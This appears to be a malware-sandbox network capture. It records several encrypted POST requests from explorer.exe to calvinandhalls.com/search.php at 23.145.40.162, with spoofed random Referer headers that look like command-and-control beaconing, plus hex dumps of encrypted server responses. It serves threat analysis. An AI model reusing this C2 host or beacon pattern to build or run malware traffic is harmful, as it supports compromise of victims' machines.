                                                                      2024-10-03 10:28:16 UTC8000INData Raw: fd fc 70 fb 51 fe f0 86 fe 61 f2 bc b9 9f 1a 6e 30 a8 25 16 08 27 0d 2f 6b 73 d1 3a 88 a8 43 a0 ee 73 49 a4 aa 78 71 c7 e2 35 77 5f 79 36 e6 0d 9e c5 9b 58 38 4c d5 b3 94 9b 00 f5 99 80 c3 0e 21 1f 01 88 37 dc 95 50 83 a7 7e 55 4a 86 06 52 5c de 31 63 03 03 3e 26 59 b8 9b 3f ea a2 38 8c f1 ee 8e 25 3c 36 d6 85 83 7d 75 bb ad 95 57 2b 93 15 cb 6d 11 1d eb 38 47 cc d7 1b 03 ae 52 e1 86 0b da bd 40 5d 6a c0 e3 d4 02 0e 92 ee 46 b0 32 09 5a 4f 57 ba 44 cc 8a 5b a2 14 a3 4d 94 9f 05 21 f2 e2 3a 01 89 ad 34 ae 98 1a b0 8d 31 87 21 f5 fb 75 44 50 ba 47 70 72 c7 08 4f 9c 47 f3 96 3f e0 34 97 7c fd 13 18 6d f2 a6 95 60 f7 54 9f d8 1b 25 69 6c c7 e7 47 6c f0 d1 16 b7 30 bd 50 a6 9c 30 22 b3 97 7a 02 7f f8 91 f8 c2 05 ec 7d ef 19 d6 14 96 8c 61 76 c1 9e c1 2c 8e 2f
                                                                      Data Ascii: pQan0%'/ks:CsIxq5w_y6X8L!7P~UJR\1c>&Y?8%<6}uW+m8GR@]jF2ZOWD[M!:41!uDPGprOG?4|m`T%ilGl0P0"z}av,/
                                                                      2024-10-03 10:28:16 UTC8000INData Raw: 7a 6e 87 48 a5 e9 a6 2c c1 74 b4 2d 63 f8 20 a6 f8 8b 52 5f b3 c7 97 e7 33 af 1c 3a 77 6d 1c 60 d2 f9 0d dc 66 f6 c3 42 e4 bd e2 f0 f5 ba ab 21 0d 16 a5 b0 9b 95 9a ee b5 cc 14 80 cc 1a 96 a0 08 b5 bd 50 d9 56 d2 3a 98 be e2 29 e2 f9 08 57 1f 23 4e c6 0a 2f 84 28 11 a0 48 e4 98 f3 86 75 fb 2b b7 ad 1e 50 23 b0 8e 6d 9a 02 9f d5 89 33 24 51 d5 8f 84 24 01 07 15 03 ca 6c bc 06 c6 0d f2 7e 86 05 6d d5 8a 52 64 49 e8 5a 6d f0 89 ef 41 b4 13 32 06 43 e4 41 09 33 ba b7 3e b8 40 7b cd af 60 f7 74 2d ab 04 f8 41 cf b8 e9 4c ad d5 3e f7 39 f9 49 31 d2 f5 61 67 43 2a 21 d9 a9 5a 7e aa 51 5d 1c 23 af fe 4c 04 07 cc 2e b8 ec ab 6e ad db 29 84 0c 62 68 f4 56 85 9f 2d 3c 72 ef 2f 79 d9 b6 a9 a7 ff 69 db 37 e4 5c fb f1 1b e2 b7 83 97 92 ee 06 04 5b 7b df e3 ba c0 93 d7
                                                                      Data Ascii: znH,t-c R_3:wm`fB!PV:)W#N/(Hu+P#m3$Q$l~mRdIZmA2CA3>@{`t-AL>9I1agC*!Z~Q]#L.n)bhV-<r/yi7\[{
                                                                      2024-10-03 10:28:16 UTC8000INData Raw: f5 b3 07 5d 5f c1 67 73 b0 c5 27 a7 47 0e 5f 7f b9 a0 bc 5a 8c ca b9 cd e9 d5 b5 b3 95 50 4a cf 1a 77 08 79 db 4e a8 75 5b d2 22 04 5c 9a cf 67 a4 a6 0a 56 68 ed 20 76 e9 63 5c be cc f2 47 e6 32 2c e3 65 3a 85 50 20 43 1e e0 1f 62 67 b4 2d f8 c4 c5 8d ff 34 a6 63 b9 5d f6 7e fd eb ce 28 e4 f3 08 67 65 f3 1d 31 2b d0 18 3b 33 67 7b 1f 73 1c 60 fd b5 6a 67 9c 34 a3 1b f4 56 fd 96 b2 8a 85 15 94 3e 68 1d 5b 9f fc 5f e3 b2 eb 82 51 e3 7c aa 5f 3a eb ab a3 97 b4 a4 03 b0 8b 03 2f 80 93 c9 ce a8 df d5 e8 80 32 8e b5 b1 58 29 dd 82 b7 76 9e 83 17 52 f4 90 b0 22 b4 b2 97 95 1a c5 b4 fd cf 93 23 74 9c 2b c3 1b 41 a1 39 9c e9 a7 eb 35 e7 8b 9f c7 34 20 07 99 af a2 0a a4 4c 88 be d2 8b 37 d7 80 11 23 dd 62 29 11 5f e6 34 9a 38 48 41 a5 f3 35 a9 f8 37 58 fb d7 cd 4b
                                                                      Data Ascii: ]_gs'G_ZPJwyNu["\gVh vc\G2,e:P Cbg-4c]~(ge1+;3g{s`jg4V>h[_Q|_:/2X)vR"#t+A954 L7#b)_48HA57XK


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.44976623.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:42 UTC289OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://xijgwgdevjmtswh.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 249
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:42 UTC249OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 4b df 19 f1 d2 a2 17 4f e3 11 70 e7 60 82 d4 38 74 a7 72 2b 49 8b bb f5 33 d4 f4 64 01 d1 a5 32 fc 27 38 ac d2 4b 35 2d 65 3a 0d f8 75 da ea 82 21 d3 e4 43 7f 27 e8 61 51 bd 7c 69 85 d0 ff dd 40 75 ae 7b b3 6b ae 1b 5e bd 43 de 66 20 29 0a 7e c8 cb 40 b6 87 0d fe 5e 0d 99 a6 c0 1c e9 8c 0a fa aa 92 cb 27 63 d5 bb c9 62 30 ab 42 06 d8 3d 67 59 b8 44 7a 76 ec 46 3c 57 e6 d0 de 72 4d 83 d5 2e bd 39 9a b4 cd 30 26 1c 39 fb 4d 2c 5d 56 29 ee 15 f0 c5 6c 32 7e 3b 41 85 97 7a 51 15 08 ad df 8e 2b 80 c9 3e e1 3b e6
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[CLj4%<KOp`8tr+I3d2'8K5-e:u!C'aQ|i@u{k^Cf )~@^'cb0B=gYDzvF<WrM.90&9M,]V)l2~;AzQ+>;
                                                                      2024-10-03 10:28:42 UTC294INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 03 Oct 2024 10:28:42 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      2024-10-03 10:28:42 UTC7898INData Raw: 31 65 65 37 0d 0a 19 00 00 00 1e 0d ae 58 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa
                                                                      Data Ascii: 1ee7X[!`.{2Pr>iLn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
                                                                      2024-10-03 10:28:42 UTC19INData Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c c7
                                                                      Data Ascii: JMQF 82
                                                                      2024-10-03 10:28:42 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:
                                                                      2024-10-03 10:28:42 UTC8192INData Raw: 32 30 30 30 0d 0a 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f 19
                                                                      Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
                                                                      2024-10-03 10:28:42 UTC6INData Raw: 20 09 6c 1a f8 c5
                                                                      Data Ascii: l
                                                                      2024-10-03 10:28:42 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:
                                                                      2024-10-03 10:28:42 UTC8192INData Raw: 32 30 30 30 0d 0a 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5 ab
                                                                      Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
                                                                      2024-10-03 10:28:42 UTC6INData Raw: 4f 16 27 c7 be ec
                                                                      Data Ascii: O'
                                                                      2024-10-03 10:28:42 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.44976723.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:43 UTC288OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://fdgupvtosasiwa.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 120
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:43 UTC120OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 27 b7 24 95 b8 c7 33 1e ac 04 3f ef 27 eb 81 63 31 fd 31 2a 5a 9e bc 96 52 a7 aa 5a 64 f8 f1 24 bf 66 33 e5 8f 09 1b 4e 6e 66
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Lj4%<'$3?'c11*ZRZd$f3Nnf
                                                                      2024-10-03 10:28:44 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:43 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.44976823.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:44 UTC288OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://kodkpkalobxsri.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 351
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:44 UTC351OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 37 bb 71 fe 94 be 25 05 b7 67 6b 82 2e e3 ed 05 08 dc 6f 5c 3f c5 b4 cc 48 de bc 55 0f 87 b1 58 af 44 28 8f ff 74 3d 74 0e 26 57 d3 19 bf f9 a2 16 ef e2 2b 33 41 93 6a 5e b4 6a 1a f2 fd b8 bd 15 73 de 16 a3 29 91 10 7b 8c 2d 9f 48 3b 42 7c 6e aa b5 71 98 dc 12 cb 32 29 f4 bb cc 3b d0 bc 4c fa 8f 87 b4 26 65 b7 ae a1 16 43 a2 0c 4d ca 02 58 26 fb 43 20 58 ce 29 63 5e 97 ae d7 61 74 80 b6 18 8a 64 82 d2 a7 04 67 73 5d d9 5f 12 74 52 71 c2 41 b6 9c 2c 57 2b 2a 04 8b a6 75 2b 15 32 c5 ea 93 20 d0 a7 3a d2 66 de be bb da 4b 89 7f
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Lk4%<7q%gk.o\?HUXD(t=t&W+3Aj^js){-H;B|nq2);L&eCMX&C X)c^atdgs]_tRqA,W+*u+2 :fK
                                                                      2024-10-03 10:28:44 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:44 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.44976923.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:45 UTC289OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://jurmqqmqntcvqoy.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 156
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:45 UTC156OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 3e f4 76 f8 c6 dd 26 47 f2 29 6c fd 74 d5 cb 0d 30 dd 05 44 41 88 ed cf 64 b4 c8 08 46 9d f5 25 ee 31 32 a6 98 18 1f 25 6a 57 43 d9 3d a3 f9 b3 47 da b2 2b 66 1c 90 51 57 a6 3d 03 c5 f0 9b b1 14 25 b2 44 c1 78 ab 03 37 94 06 db 4e 0d
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Lh4%<>v&G)lt0DAdF%12%jWC=G+fQW=%Dx7N
                                                                      2024-10-03 10:28:46 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:45 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.44977023.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:46 UTC287OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://hftfsugmiikbs.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 339
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:46 UTC339OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 60 ac 01 89 c7 ff 5f 15 aa 36 0f a6 21 e2 93 6e 3d a3 66 12 72 97 c1 89 4c d2 d3 62 50 de f5 5e 89 68 57 ae c4 79 6b 70 69 21 20 d0 35 dc 9e d1 2d d9 be 37 76 45 98 7e 11 e3 70 7f 8d fe 84 df 14 11 97 74 c5 7a b8 65 44 81 46 a3 78 74 33 1d 41 eb d7 0d 9d a8 7a 9b 4b 70 db a1 ad 03 a4 b3 7a 8a 8a e8 d8 16 2b d1 a3 bf 43 4a 89 11 44 8b 3e 7a 55 88 4c 25 78 c4 16 18 31 c7 b4 d7 08 22 ab b3 6b a1 3a 83 be cf 09 35 19 76 d8 68 21 61 24 73 ee 4b b6 8a 7b 40 2c 45 57 c7 81 3b 3b 0c 42 c6 9c 97 34 f2 ab 72 97 6c bf 96 ef be 00 d9 5b
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Li4%<`_6!n=frLbP^hWykpi! 5-7vE~ptzeDFxt3AzKpz+CJD>zUL%x1"k:5vh!a$sK{@,EW;;B4rl[
                                                                      2024-10-03 10:28:47 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:46 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.44977123.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:47 UTC290OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://wyhdnnvnqsrlhywg.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 273
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:47 UTC273OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 26 c6 13 9c 94 d3 59 21 bc 00 27 fc 4b f5 e2 7f 0e c2 29 29 75 a8 ca fc 51 e8 b1 09 68 eb 97 24 b0 5a 54 a4 d6 53 61 4d 00 22 4f ef 75 bb cb b6 28 8e f0 32 64 1d f1 0b 38 c1 6e 1c f4 cb 85 c3 27 2a da 04 e0 23 bf 72 30 cf 39 bc 25 62 4e 1a 59 fc ea 5a f9 97 6e e5 59 0b c7 a3 b4 5f b0 a1 65 bc d9 ed d3 0b 48 a5 a0 af 06 20 95 43 4c 9c 60 49 2a 82 28 7e 3b d5 00 0f 57 d9 ce f1 1d 26 df e2 2f 8f 38 f2 e3 d2 70 30 6f 76 d6 01 14 6e 5a 05 ac 01 b1 ad 65 33 70 50 53 f3 fc 51 28 2d 21 dc e5 c4 2f f8 ac 04 80 6c 9c a7 e2 94 6d d6 46
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Ln4%<&Y!'K))uQh$ZTSaM"Ou(2d8n'*#r09%bNYZnY_eH CL`I*(~;W&/8p0ovnZe3pPSQ(-!/lmF
                                                                      2024-10-03 10:28:48 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:47 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.44977223.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:48 UTC288OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://lapmbexmlxcjol.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 164
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:48 UTC164OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 62 b8 7b a2 c0 da 59 31 ea 70 6d ba 65 ee 8d 38 02 df 05 20 3c 9e b9 dd 77 ab d9 5e 7b cf a1 3d fd 49 61 a5 e3 5f 6a 64 47 1e 53 fd 2e c1 d3 df 0f e5 8a 7f 7b 3b 86 65 06 ad 66 41 dc 9f ea 86 13 33 b7 79 d1 76 9f 6a 61 8f 22 dc 62 3e 31 35 45 d0 c8 63 b0 ff
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Lo4%<b{Y1pme8 <w^{=Ia_jdGS.{;efA3yvja"b>15Ec
                                                                      2024-10-03 10:28:48 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:48 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.44977323.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:49 UTC289OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://vblsrajdotdorwh.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 162
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:49 UTC162OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 31 aa 35 be 92 c7 09 54 a1 22 1f 82 5e fe 92 00 6e b4 6f 57 56 9b f8 db 66 a5 c8 45 55 dc 97 2e be 6e 2f e7 e8 16 20 76 79 3e 06 ce 13 8b 8e a2 0e ce a6 51 0a 48 f9 7f 59 ee 4e 5e e2 84 92 99 0f 1e 86 45 a1 6e fb 02 79 ca 5d da 60 35 2d 14 6b c2 e9 28
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Ll4%<15T"^noWVfEU.n/ vy>QHYN^Eny]`5-k(
                                                                      2024-10-03 10:28:50 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:49 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.44977423.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:51 UTC289OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://ofhxxqwynqyymdr.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 320
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:51 UTC320OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 2d f2 09 fe 96 a0 53 2a b7 2c 7a ba 44 c6 ea 13 3b d1 34 3f 74 a1 c1 8c 70 df ab 60 7b fb e1 35 8b 20 4c a3 db 09 02 23 01 57 5f 91 79 8e cc 94 27 84 f1 2d 65 08 fb 79 47 cf 7a 00 80 ff ae 95 28 77 8f 61 b5 7a 90 3d 35 d0 52 cf 39 7c 2b 2f 08 fb b8 6f 81 dd 0f c2 35 08 f8 c0 93 1e be 8d 41 94 8d 85 d1 19 2b c0 b4 84 0f 07 b1 7c 58 f0 2b 76 4a fb 5a 2d 40 cd 28 11 0c f2 a4 9e 2b 3f d8 f4 7e 8b 62 89 e9 fe 26 34 18 3b c7 10 01 06 1c 7a c2 40 bb a2 06 34 03 5c 2b 81 84 33 64 08 52 ca ce 90 2e 8c d8 3d d1 46 b1 a2 af de 13 c5 59
